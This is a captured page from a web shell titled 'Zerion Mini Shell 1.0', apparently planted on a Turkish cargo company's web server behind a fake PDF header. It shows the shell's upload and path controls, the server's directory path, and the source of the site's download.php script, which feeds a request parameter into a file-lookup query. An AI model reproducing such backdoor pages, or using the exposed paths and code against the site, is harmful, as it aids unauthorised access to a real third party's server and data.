%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/cargonizer/domains/cargonizer.com.tr/public_html/
Upload File :
Create Path :
Current File : /home/cargonizer/domains/cargonizer.com.tr/public_html/download.php

<?php
    @session_start();
    @ob_start();

    include 'includes/functions.php';
    include 'includes/db.php';

    $id = clean($_GET["hash"]);
    $rs = getTable('files',"WHERE md5(id)='{$id}'");
    
    $dosya = "files/". $rs['file'];
    $ext = end(explode(".", $dosya));
    $isim = ($rs['name']);
    
    header('Content-type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'. $isim .".". $ext .'"');
    readfile($dosya);
    
?>

Zerion Mini Shell 1.0